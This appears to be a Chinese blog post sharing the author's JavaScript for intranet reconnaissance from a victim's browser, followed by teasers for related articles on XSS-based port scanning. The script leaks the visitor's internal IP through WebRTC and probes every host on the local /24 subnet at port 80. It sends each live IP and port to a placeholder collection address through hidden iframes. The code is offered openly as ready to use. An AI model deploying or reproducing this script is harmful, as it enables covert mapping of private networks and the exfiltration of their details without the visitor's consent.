摘要:使用的屬性來發送數據內容接受的地址接受內網的參數接受內網開放端口的參數如果想獲取真實的外網,請把下一行改為遍歷內網及端口,這里只寫了端口,多個端口,速度將會的非常慢。
var ip_arr = []; var TagName = document.getElementsByTagName("body")[0]; function form_ip(ip,port){ //使用iframe的src屬性來發送ip、port數據內容 var iframe = document.createElement("iframe"); iframe.setAttribute("src","接受的地址?接受內網ip的參數=" + ip + "&接受內網開放端口的參數=" + port); iframe.setAttribute("style","display:none") TagName.appendChild(iframe); } function getIPs(callback){ var ip_dups = {}; var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; var mediaConstraints = { optional: [{RtpDataChannels: true}] }; var servers = undefined; if(window.webkitRTCPeerConnection) //如果想獲取真實的外網IP,請把下一行改為servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]}; servers = {iceServers: []}; var pc = new RTCPeerConnection(servers, mediaConstraints); pc.onicecandidate = function(ice){ if(ice.candidate){ var ip_regex = /([0-9]{1,3}(.[0-9]{1,3}){3})/ var ip_addr = ip_regex.exec(ice.candidate.candidate)[1]; if(ip_dups[ip_addr] === undefined) callback(ip_addr); ip_dups[ip_addr] = true; } }; pc.createDataChannel(""); pc.createOffer(function(result){ pc.setLocalDescription(result, function(){}); }, function(){}); } getIPs(function(ip){ //遍歷內網ip及80端口,這里只寫了80端口,多個端口,速度將會的非常慢。 ip = ip.split("."); ip.pop(); ip = ip.join("."); for(var i = 1;i<=255;i++){ var script = document.createElement("script"); var ip_url = ip + "." + i + ":80"; script.setAttribute("src","http://" + ip_url); script.setAttribute("onload","form_ip("" + ip + "." + i + "","80")"); TagName.appendChild(script); } });
雖然WebRTC已經不是什么新技術了,用JavaScript進行內網滲透,網上也有說明,但是都沒怎么放出代碼。這里就就放出我自己的寫的。getIPs(function(ip){...} 效率不怎么高,如有更高者可以在下面給出。
文章版權歸作者所有,未經允許請勿轉載,若此文章存在違規行為,您可以聯系管理員刪除。
轉載請注明本文地址:http://specialneedsforspecialkids.com/yun/85734.html
摘要:為了使連接起作用,對等方必須獲取元數據的本地媒體條件例如,分辨率和編解碼器功能,并收集應用程序主機的可能網絡地址,用于來回傳遞這些關鍵信息的信令機制并未內置到中。所有特定于多媒體的元數據都使用協議傳遞。 這是專門探索 JavaScript 及其所構建的組件的系列文章的第 18 篇。 想閱讀更多優質文章請猛戳GitHub博客,一年百來篇優質文章等著你! 如果你錯過了前面的章節,可以在這里...
摘要:探測端口開放原理就是向目標發送請求,看是否有回應。端口判定為不通。掃描批量目標掃描批量目標使用的并發隊列功能,去執行的執行單個任務,在掃描前做了一些額外的工作把瀏覽器屏蔽的端口過濾掉了,收到的狀態就是。 0×00 前言 前兩天 freebuf上的的XSS到內網的公開課很受啟發,從一個頁面到局域網,威力著實增強不少 公開課上檢測內網 IP 實現方式用的是 img 標簽,加載網站的 fav...
摘要:探測端口開放原理就是向目標發送請求,看是否有回應。端口判定為不通。掃描批量目標掃描批量目標使用的并發隊列功能,去執行的執行單個任務,在掃描前做了一些額外的工作把瀏覽器屏蔽的端口過濾掉了,收到的狀態就是。 0×00 前言 前兩天 freebuf上的的XSS到內網的公開課很受啟發,從一個頁面到局域網,威力著實增強不少 公開課上檢測內網 IP 實現方式用的是 img 標簽,加載網站的 fav...
閱讀 1437·2021-11-25 09:43
閱讀 2580·2021-09-24 10:30
閱讀 3659·2021-09-06 15:02
閱讀 3593·2019-08-30 15:55
閱讀 3299·2019-08-30 15:53
閱讀 1692·2019-08-30 15:52
閱讀 2142·2019-08-30 14:21
閱讀 2009·2019-08-30 13:55